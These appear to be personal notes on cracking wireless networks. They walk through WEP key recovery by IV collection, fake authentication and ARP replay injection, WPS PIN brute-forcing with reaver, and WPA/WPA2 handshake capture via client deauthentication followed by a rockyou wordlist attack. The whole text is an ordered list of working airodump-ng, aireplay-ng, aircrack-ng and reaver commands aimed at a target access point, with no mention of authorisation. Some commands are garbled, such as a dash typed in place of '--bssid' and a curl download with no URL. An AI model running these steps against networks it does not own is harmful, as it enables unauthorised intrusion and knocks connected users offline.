Cracking WEP


Algorithm RC4, each packet is encrypted at the Access Point and decrpyted at client.

Each packet has unique 24 bit Initializing Vector contained in packets in plain text.

Short IV means busy network. We collect packets with the same IV and use aircrack-ng to determine WEP key using statistical attacks.

The more IV collected the more likely to crack key.

airodump-ng wlan0mon

airodump-ng --bssid 00:00:00:00:00:00 --channel 2 --write output wlan0mon

aircrack-ng output-01.cap

#Data – number of packets with unique/new IVs

If AP has no clients we have to inject packets into the traffic in order to force the router to create new packets with new IVs.

aireplay-ng --fakeauth 0 -a [target MAC] -h [your MAC] [interface]

If auth was successful the valueof AUTH columns changes to OPN.

Packet injection ARP request reply

After successfully associating with the target AP, we will wait for an ARP packte, we will capture this packet and inject it into the traffic. The AP is forcet to create new packet with a new IV, we capture this packet and inject it. Repeat until enough IVs.

aireplay-ng --arpreplay -b [target MAC] -h [your MAC] [interface]


airodump-ng --bssid 00:00:00:00:00:00 --channel 2 --write arpreplaytest wlan0mon

aireplay-ng --fakeauth 0 -a 00:00:00:00:00:00 -h 12:13:14:15:16:17

aireplay-ng --arpreplay -b 00:00:00:00:00:00 -h 12:13:14:15:16:17 wlan0mon

aircrack-ng arpreplaytest-01.cap

WPA cracking

Designed to address the issues in WEP, better encryption.

Main issue in WEP is the short IV which means they can be repeated and cracked.

In WPA each packte is encrypted with a unique temporary key, this means the number of data packets we collect is irrelecant.

WPA and WPA2 are similar, diff. is that WPA22 uses an algorithm CCMP.

WPS feature

Allows users to connect to WPS enabled network using a WPS button or by clicking on WPS functionality.

Authentication is done using an 8 digit pin. This means we can brute force pin in less than 10 hours.

To recover WPA key from the pin we use reaver tool.

WPS Locked – can’t use WPS attack, because AP will lock itself after a number of attacks.

wash -i mon0 // scan tool

reaver -b 00:49:10:90:2D:EE -c 11 -i wlan0mon

reaver --delay=<sec>

reaver --lock-delay=<sec>

reaver -D //deamonize reaver

WPA/WPA2 Cracking

The only packets that contain info that help crack the pass is the handshake packets.

Every time a client connects to the AP a four way handshake occurs between client and AP.

By capturing the handshake we can use aircrack to launch a wordlist attack against the handshake to determine the key.

Below is a list of all of the commands needed to crack a WPA/WPA2 network, in order, with minimal explanation.

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 — bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## crack password with aircrack-ng… ##########

# download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap